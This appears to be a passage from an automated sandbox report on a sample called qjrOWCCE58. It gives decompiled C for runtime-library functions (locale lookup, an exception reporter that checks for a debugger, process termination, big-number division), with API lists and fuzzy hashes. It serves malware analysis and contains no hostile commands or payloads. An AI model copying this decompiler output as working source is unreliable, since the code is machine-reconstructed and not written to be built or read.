				_t50 =  *0x43b054; // 0x41d6575c
				_v8 = _t50 ^ _t127;
				_t94 = E0041B333(__ecx, __edx);
				_t124 =  *(E0041B333(__ecx, __edx) + 0x34c);
				_t126 = E00425CAA(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					__eflags = 1;
					L38:
					return E0040D3AF(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E004221B2(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E004221B2(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						__eflags =  *(_t94 + 0x60);
						if( *(_t94 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t94 + 0x5c);
						if( *(_t94 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E004221B2(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t124);
						_t94 = 0;
						_t78 = E00425E01(__eflags, _t126, 0);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						__eflags = _t124[1];
						L34:
						if(_t141 == 0) {
							_t124[1] = _t126;
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						__eflags =  *(_t94 + 0x5c) - _t74;
						if( *(_t94 + 0x5c) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
							__eflags = _t80 - _v252;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						__eflags = _t122 - _v256 >> 1 -  *(_t94 + 0x5c);
						if(__eflags != 0) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						_t81 = E00425E01(__eflags, _t126, 1);
						__eflags = _t81;
						if(_t81 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t141 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E004221B2(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					__eflags = _t115 & 0x00000002;
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t94 + 0x5c);
					if( *(_t94 + 0x5c) == 0) {
						L12:
						_t121 =  *_t124;
						__eflags = _t121 & 0x00000001;
						if((_t121 & 0x00000001) != 0) {
							goto L16;
						}
						_t90 = E00425DDC(_t126);
						__eflags = _t90;
						if(_t90 == 0) {
							goto L16;
						}
						_t121 = _t121 | 0x00000001;
						__eflags = _t121;
						 *_t124 = _t121;
						goto L15;
					}
					_t92 = E004160A3(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
					_t128 = _t128 + 0xc;
					__eflags = _t92;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					__eflags =  *_t124;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
						__eflags = _t93 - _v252;
					} while (_t93 != _v252);
					__eflags = _t117 - _t121 >> 1 -  *(_t94 + 0x5c);
					if(_t117 - _t121 >> 1 ==  *(_t94 + 0x5c)) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x00425982
0x0042598d
0x00425994
0x004259a2
0x004259aa
0x004259b9
0x004259c5
0x004259d6
0x004259dc
0x004259e5
0x00425bbf
0x00425bc1
0x00425bc3
0x00425bc3
0x00425bc4
0x00425bd2
0x00425bd2
0x004259fe
0x00425ab9
0x00425ac4
0x00425bb3
0x00425bba
0x00000000
0x00425bba
0x00425ad8
0x00425aee
0x00000000
0x00000000
0x00425afe
0x00425b07
0x00425b75
0x00425b78
0x00000000
0x00000000
0x00425b7a
0x00425b7d
0x00000000
0x00000000
0x00425b90
0x00425b92
0x00000000
0x00000000
0x00425b94
0x00425b95
0x00425b99
0x00425ba1
0x00425ba3
0x00000000
0x00000000
0x00425ba5
0x00425bab
0x00425bae
0x00425bae
0x00425bb0
0x00425bb0
0x00000000
0x00425bae
0x00425b0b
0x00425b11
0x00425b16
0x00425b28
0x00425b2b
0x00000000
0x00000000
0x00425b2d
0x00425b33
0x00425b39
0x00425b39
0x00425b3c
0x00425b3f
0x00425b3f
0x00425b4e
0x00425b50
0x00425b53
0x00425b6f
0x00000000
0x00425b6f
0x00425b55
0x00425b59
0x00425b61
0x00425b63
0x00000000
0x00000000
0x00425b65
0x00425b6b
0x00425b20
0x00425b20
0x00000000
0x00425b20
0x00425b18
0x00425b1e
0x00000000
0x00425b1e
0x00425a12
0x00425a28
0x00000000
0x00000000
0x00425a38
0x00425a3f
0x00425a43
0x00425a52
0x00425a55
0x00000000
0x00000000
0x00425a57
0x00425a5b
0x00425a9f
0x00425a9f
0x00425aa1
0x00425aa4
0x00000000
0x00000000
0x00425aa7
0x00425aad
0x00425aaf
0x00000000
0x00000000
0x00425ab1
0x00425ab1
0x00425ab4
0x00000000
0x00425ab4
0x00425a6a
0x00425a6f
0x00425a72
0x00425a74
0x00000000
0x00000000
0x00425a76
0x00425a76
0x00425a79
0x00425a7c
0x00425a7f
0x00425a82
0x00425a82
0x00425a85
0x00425a88
0x00425a88
0x00425a95
0x00425a98
0x00425a9a
0x00425a9a
0x00425a45
0x00425a4b
0x00425a4e
0x00425ab6
0x00425ab6
0x00425ab6

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

Part of subcall function 0041B333: _free.LIBCMT ref: 0041B395
Part of subcall function 0041B333: _free.LIBCMT ref: 0041B3CB

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004259D6
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00425A20
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00425AE6

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 816a9e87cc9655610b9b025e372c4c3802c96873384059569e6e0daa63106489
Instruction ID: b157c82a2e358b5c61007cfe450362a4b0815213fbe50c8436a63ffd4427a1ef
Opcode Fuzzy Hash: 816a9e87cc9655610b9b025e372c4c3802c96873384059569e6e0daa63106489
Instruction Fuzzy Hash: 6561D6717105279FDB289F25ED82BBA77A8EF14300F5041BBED05C6285E778EA81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00845BE9 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0083B59A: GetLastError.KERNEL32(00821CDF,?,00821CE3,008320B8,?,00821CDF,0042C0B4,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B59F
Part of subcall function 0083B59A: SetLastError.KERNEL32(00000000,0043B1C8,000000FF,?,0083B84A,00000000,0042C0B4,00000000,00000000,00821CDF), ref: 0083B63D

Part of subcall function 0083B59A: _free.LIBCMT ref: 0083B5FC
Part of subcall function 0083B59A: _free.LIBCMT ref: 0083B632

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00845C3D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00845C87
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00845D4D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 816a9e87cc9655610b9b025e372c4c3802c96873384059569e6e0daa63106489
Instruction ID: 6311b30abbbf84409411febf58d6b3a8665b4c65e837b8971630e2a28e4e0559
Opcode Fuzzy Hash: 816a9e87cc9655610b9b025e372c4c3802c96873384059569e6e0daa63106489
Instruction Fuzzy Hash: 72619E71A10A0F9FDB289F28CC86BBE73A8FF14304F108179E905C6186E738DA95CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00411B5B Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00411B5B(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x43b054; // 0x41d6575c
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040DFDB(_t41);
					_pop(_t61);
				}
				E0040F2F0(_t66,  &_v804, 0, 0x50);
				E0040F2F0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0040DFDB(_t57);
				}
				return E0040D3AF(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00411b5b
0x00411b5b
0x00411b5b
0x00411b66
0x00411b6b
0x00411b6d
0x00411b75
0x00411b77
0x00411b7a
0x00411b7f
0x00411b7f
0x00411b8b
0x00411b9e
0x00411bac
0x00411bb2
0x00411bb8
0x00411bbe
0x00411bc4
0x00411bca
0x00411bd0
0x00411bd6
0x00411bdc
0x00411be2
0x00411be9
0x00411bf0
0x00411bf7
0x00411bfe
0x00411c05
0x00411c0c
0x00411c0d
0x00411c16
0x00411c1c
0x00411c1f
0x00411c25
0x00411c32
0x00411c3b
0x00411c44
0x00411c4d
0x00411c5b
0x00411c5d
0x00411c72
0x00411c7e
0x00411c81
0x00411c86
0x00411c93

APIs

IsDebuggerPresent.KERNEL32 ref: 00411C53
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00411C5D
UnhandledExceptionFilter.KERNEL32(?), ref: 00411C6A

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0069e26e678a4becaa407cc511bf7ad3234830fb1f4ac5828c4af2ef26379aa3
Instruction ID: d3ea1fee42158f3c8c7c86c09dd4e08354272e620b567da164912ef5f02ebe98
Opcode Fuzzy Hash: 0069e26e678a4becaa407cc511bf7ad3234830fb1f4ac5828c4af2ef26379aa3
Instruction Fuzzy Hash: E231E5749412289BCB21DF65DC897DDBBB8BF08310F5041EAE51CA72A1E7349F858F48

Uniqueness

Uniqueness Score: -1.00%

Function 00831DC2 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00831EBA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00831EC4
UnhandledExceptionFilter.KERNEL32(?), ref: 00831ED1

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0069e26e678a4becaa407cc511bf7ad3234830fb1f4ac5828c4af2ef26379aa3
Instruction ID: ae724717b377b33f7449ee7a1118c7aad4516f00319c2aaedcc8039a7fde3563
Opcode Fuzzy Hash: 0069e26e678a4becaa407cc511bf7ad3234830fb1f4ac5828c4af2ef26379aa3
Instruction Fuzzy Hash: 2B31D27490122C9BCB21DF68D98979DBBB8FF08710F5041EAE40CA7251E7309F818F95

Uniqueness

Uniqueness Score: -1.00%

Function 008365E6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,008365E5,00000000,0042C0B4,?,00000000,?,0083B84A), ref: 00836608
TerminateProcess.KERNEL32(00000000,?,008365E5,00000000,0042C0B4,?,00000000,?,0083B84A), ref: 0083660F
ExitProcess.KERNEL32 ref: 00836621

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 55a1ffa9ac8918d10742ae41920f232cdb793064bf27e88115d4d494d02cc488
Instruction ID: 53efe04f184161c58ff0461ffa8e98f9e41bdbd71750c117a421627c159e2399
Opcode Fuzzy Hash: 55a1ffa9ac8918d10742ae41920f232cdb793064bf27e88115d4d494d02cc488
Instruction Fuzzy Hash: E6E0B671101508BBCF216F68DD5A95C7F69FB90785F408824F805C7232EB35DDA2CAC9

Uniqueness

Uniqueness Score: -1.00%

Function 00837EE0 Relevance: 3.5, APIs: 2, Instructions: 504COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00838031

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID:
API String ID: 1302938615-0
Opcode ID: c1b85765eef1a27d5fdd1813d5d709c9b5a9fe25bc7ffe9288542ba49ef8003b
Instruction ID: 7c6c6c7bf5ab8d5768deb4e694622e8cb21b64630bca32bb60a0a715bfef19d3
Opcode Fuzzy Hash: c1b85765eef1a27d5fdd1813d5d709c9b5a9fe25bc7ffe9288542ba49ef8003b
Instruction Fuzzy Hash: B9022F71E00619DFDF14CFA9D8806AEB7B1FF88314F258169E919EB344DB31AA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00417CE0 Relevance: 3.4, APIs: 2, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00417CE0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t253;
				unsigned int _t254;
				signed int _t256;
				signed int* _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr _t264;
				void* _t268;
				signed char _t274;
				signed int* _t277;
				signed int _t281;
				signed int* _t282;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t334;
				signed int _t341;
				signed int* _t342;

				_t244 = _a4;
				_t325 =  *_t244;
				if(_t325 == 0) {
					L74:
					__eflags = 0;
					return 0;
				} else {
					_t289 = _a8;
					_t190 =  *_t289;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L74;
					} else {
						_t312 = _t190 - 1;
						_t5 = _t325 - 1; // 0x1cb
						_t253 = _t5;
						_v12 = _t253;
						if(_t312 != 0) {
							__eflags = _t312 - _t253;
							if(_t312 > _t253) {
								goto L74;
							} else {
								_t191 = _t253;
								_t291 = _t253 - _t312;
								__eflags = _t253 - _t291;
								if(_t253 < _t291) {
									L19:
									_t291 = _t291 + 1;
									__eflags = _t291;
								} else {
									_t277 =  &(_t244[_t253 + 1]);
									_t341 = _a8 + _t312 * 4 + 4;
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t277;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t341 = _t341 - 4;
										_t277 = _t277 - 4;
										__eflags = _t191 - _t291;
										if(_t191 >= _t291) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t291;
								if(__eflags == 0) {
									goto L74;
								} else {
									_t192 = _a8;
									_t245 = _v56;
									_t326 =  *(_t192 + _t245 * 4);
									_t55 = _t245 * 4; // 0xfffef582
									_t254 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t326;
									_v36 = _t254;
									if(__eflags == 0) {
										_t313 = 0x20;
									} else {
										_t313 = 0x1f - _t192;
									}
									_v16 = _t313;
									_v48 = 0x20 - _t313;
									__eflags = _t313;
									if(_t313 != 0) {
										_t274 = _t313;
										_v36 = _v36 << _t274;
										_v52 = _t326 << _t274 | _t254 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t68 = _t245 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t327 = 0;
									_v32 = 0;
									_t292 = _t291 + 0xffffffff;
									__eflags = _t292;
									_v28 = _t292;
									if(_t292 >= 0) {
										_t197 = _t292 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t292 * 4;
										_t260 = _t247 - 4 + _t197 * 4;
										_v80 = _t260;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t260[2];
											}
											_t296 = _t260[1];
											_t261 =  *_t260;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t261;
											__eflags = _t313;
											if(_t313 != 0) {
												_t303 = _v8;
												_t319 = _t261 >> _v48;
												_t221 = E0042A6F0(_t296, _v16, _t303);
												_t261 = _v16;
												_t198 = _t303;
												_t296 = _t319 | _t221;
												_t327 = _v24 << _t261;
												__eflags = _v60 - 3;
												_v8 = _t303;
												_v24 = _t327;
												if(_v60 >= 3) {
													_t261 = _v48;
													_t327 = _t327 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t261;
													__eflags = _t327;
													_t198 = _v8;
													_v24 = _t327;
												}
											}
											_push(_t247);
											_t199 = E0042A4C0(_t296, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t328 = _t327 ^ _t327;
											_t200 = _t296;
											_v8 = _t249;
											_v20 = _t200;
											_t314 = _t261;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t328;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E0040DDA0(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t328;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t328;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L41;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L41:
															_v8 = _v24;
															_t219 = E0040DDA0(_v36, 0, _t249, _t200);
															__eflags = _t296 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L44:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v52;
																__eflags = _t314;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L44;
																}
															}
															L48:
															_v8 = _t249;
															goto L49;
														}
														_t200 = _v20;
														goto L48;
													}
												}
											}
											L49:
											__eflags = _t200;
											if(_t200 != 0) {
												L51:
												_t262 = _v56;
												_t315 = 0;
												_t329 = 0;
												__eflags = _t262;
												if(_t262 != 0) {
													_t252 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t262;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t268 = _t315 + _v72 * _v12;
														asm("adc esi, edx");
														_t315 = _t329;
														_t329 = 0;
														__eflags = _t216 - _t268;
														if(_t216 < _t268) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t268;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t262 = _v56;
												}
												__eflags = 0 - _t329;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L60:
														__eflags = _t262;
														if(_t262 != 0) {
															_t251 = 0;
															_t299 = _v64;
															_t334 = _a8 + 4;
															__eflags = _t334;
															_t316 = _t262;
															do {
																_t264 =  *_t299;
																_t161 = _t334 + 4; // 0x8d8b5959
																_t334 = _t161;
																_t299 = _t299 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t299 - 4)) = _t264 +  *((intOrPtr*)(_t334 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L60;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L51;
												}
											}
											_t327 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t298 = _v28 - 1;
											_t313 = _v16;
											_t260 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t298;
											_v60 = _t197;
											_v80 = _t260;
											__eflags = _t298;
										} while (_t298 >= 0);
									}
									_t246 = _a4;
									_t256 = _v12 + 1;
									_t195 = _t256;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t295 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t295 = 0;
											_t295 =  &(_t295[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
										} while (_t195 <  *_t246);
									}
									 *_t246 = _t256;
									__eflags = _t256;
									if(_t256 != 0) {
										while(1) {
											__eflags = _t246[_t256];
											if(_t246[_t256] != 0) {
												goto L73;
											}
											_t256 = _t256 + 0xffffffff;
											__eflags = _t256;
											 *_t246 = _t256;
											if(_t256 != 0) {
												continue;
											}
											goto L73;
										}
									}
									L73:
									return _v32;
								}
							}
						} else {
							_t7 = _t289 + 4; // 0xfffff89c
							_t304 =  *_t7;
							_v12 = _t304;
							if(_t304 != 1) {
								__eflags = _t253;
								if(_t253 != 0) {
									_t323 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t253 - 0xffffffff;
									if(_t253 != 0xffffffff) {
										_t281 = _t253 + 1;
										__eflags = _t281;
										_t282 =  &(_t244[_t281]);
										_v32 = _t282;
										do {
											_t236 = E0042A4C0( *_t282, _t323, _t304, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t304;
											_t323 = _t282;
											_v16 = 0 + _t236;
											_t304 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t282 = _v32 - 4;
											_v32 = _t282;
											_t325 = _t325 - 1;
											__eflags = _t325;
										} while (_t325 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t342 =  &(_t244[1]);
									 *_t244 = 0;
									E00414A03(_t342, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t342 = _t323;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t324 =  &(_t244[1]);
									_v544 = _t253;
									 *_t244 = _t253;
									E00414A03(_t324, 0x1cc,  &_v540, _t253);
									_t239 = _t244[1];
									_t309 = _t239 % _v12;
									__eflags = 0 - _t309;
									 *_t324 = _t309;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t312;
								 *_t244 = _t312;
								E00414A03( &(_t244[1]), 0x1cc,  &_v540, _t312);
								return _t244[1];
							}
						}
					}
				}
			}

0x00417cec
0x00417cf1
0x00417cf5
0x0041816f
0x00418171
0x00418177
0x00417cfb
0x00417cfb
0x00417cfe
0x00417d00
0x00417d05
0x00000000
0x00417d0b
0x00417d0b
0x00417d0e
0x00417d0e
0x00417d11
0x00417d16
0x00417e47
0x00417e49
0x00000000
0x00417e4f
0x00417e51
0x00417e53
0x00417e55
0x00417e57
0x00417e7b
0x00417e7b
0x00417e7b
0x00417e59
0x00417e60
0x00417e63
0x00417e63
0x00417e66
0x00417e68
0x00417e6a
0x00000000
0x00000000
0x00417e6c
0x00417e6d
0x00417e70
0x00417e73
0x00417e75
0x00000000
0x00417e77
0x00000000
0x00417e77
0x00000000
0x00417e75
0x00417e79
0x00000000
0x00000000
0x00417e79
0x00417e7c
0x00417e7c
0x00417e7e
0x00000000
0x00417e84
0x00417e84
0x00417e87
0x00417e8a
0x00417e8d
0x00417e8d
0x00417e91
0x00417e94
0x00417e97
0x00417e9a
0x00417ea5
0x00417e9c
0x00417ea1
0x00417ea1
0x00417eaf
0x00417eb4
0x00417eb7
0x00417eb9
0x00417ec2
0x00417ec4
0x00417ecb
0x00417ece
